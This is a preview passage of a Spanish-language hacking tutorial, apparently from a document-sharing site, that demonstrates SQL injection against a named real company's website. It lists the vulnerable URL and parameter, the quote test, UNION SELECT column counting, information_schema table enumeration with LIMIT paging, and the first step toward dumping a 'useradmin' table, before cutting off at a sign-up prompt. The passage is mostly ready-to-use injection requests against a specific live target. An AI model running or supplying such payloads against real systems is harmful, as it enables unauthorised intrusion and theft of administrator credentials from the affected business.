Pochohacker
Páginas: 6 (1261 palabras)
Publicado: 14 de septiembre de 2012
www.hindustanimpex.co.in
El link vulnerable en esta pagina es:
www.hindustanimpex.co.in/products.php?catcode=11&catname=Bicycle%20Tube %20Valve
El parametrovulnerable en este link es “catcode=” Por lo tanto trabajaremos con este link:
www.hindustanimpex.co.in/products.php?catcode=
para ver si una web es vulnerable borramos todo lo que sale a la derecha del dork en la direccion de la pagina q encontramos y ponemos una comilla simple (')
http://www.hindustanimpex.co.in/products.php?catcode='
lo cual nos mandara este error: Warning: mysql_fetch_assoc():supplied argument is not a valid MySQL result resource in /home/hind9098/public_html/products.php on line 61
listo nos da un error con eso podemos hacer las consultas, primero vamos a ver en que columnas hacerlas para eso ponemos
http://www.hindustanimpex.co.in/products.php?catcode=-1+UNION+SELECT+1
Despues vamos agregando numeros al final separados por comas hasta que aparescan lascolumnas vulnerables.
http://www.hindustanimpex.co.in/products.php?catcode=-1+UNION+SELECT+1,2 http://www.hindustanimpex.co.in/products.php?catcode=-1+UNION+SELECT+1,2,3 http://www.hindustanimpex.co.in/products.php?catcode=-1+UNION+SELECT+1,2,3,4 http://www.hindustanimpex.co.in/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5http://www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,2,3,4,5,6 http://www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,2,3,4,5,6,7 http://www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,2,3,4,5,6,7,8 http://www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,2,3,4,5,6,7,8,9 http://www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10
ahora por fin nos dio la columna con la que vamosa trabajar, salio un numero, el 2, a veces salen mas o otros números, bueno con ese numero inyectaremos nuestro codigo en ese numero y al final de la columna
primero veremos los nombres de las tablas lo podemos hacer asi: usaremos: group_concat(table_name) +from+information_schema.tables entonces quedarahttp://www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_sche ma.tables
aquí podremos ver las columnas que tiene esta pagina. Ahora enpezaremos a explorar las tablas hasta encontrar la que queremos la cual es la de el admin, administrators,users o cualquier otra cosa le agragaremos un +limit+1,1-nuestro link quedaria asi:http://www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limi t+1,1--
E iremos cambiando el penultimo numero de la sentencia:
www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limi t+1,1-www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+2,1-www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limi t+3,1-www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limi t+4,1-asi hasta encontrar la columna que queremoshttp://www.hindustanimpex.co.in/products.php?catcode=1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limi t+27,1--
ven :D
encontramos la tabla de USERADMIN!!
ahora queremos saber que contiene la “useradmin” para ello debemos pasarlo a ascii, quedara: 117,115,101,114,97,100,109,105,110 reeplazaremos de nuevo nuestro 2 por group_concat(column_name) despues de from colocaremos information_schema.columns+where+table_name=char(NUMERO ASCII) nos debe de quedar asi:...
Leer documento completo
Regístrate para leer el documento completo.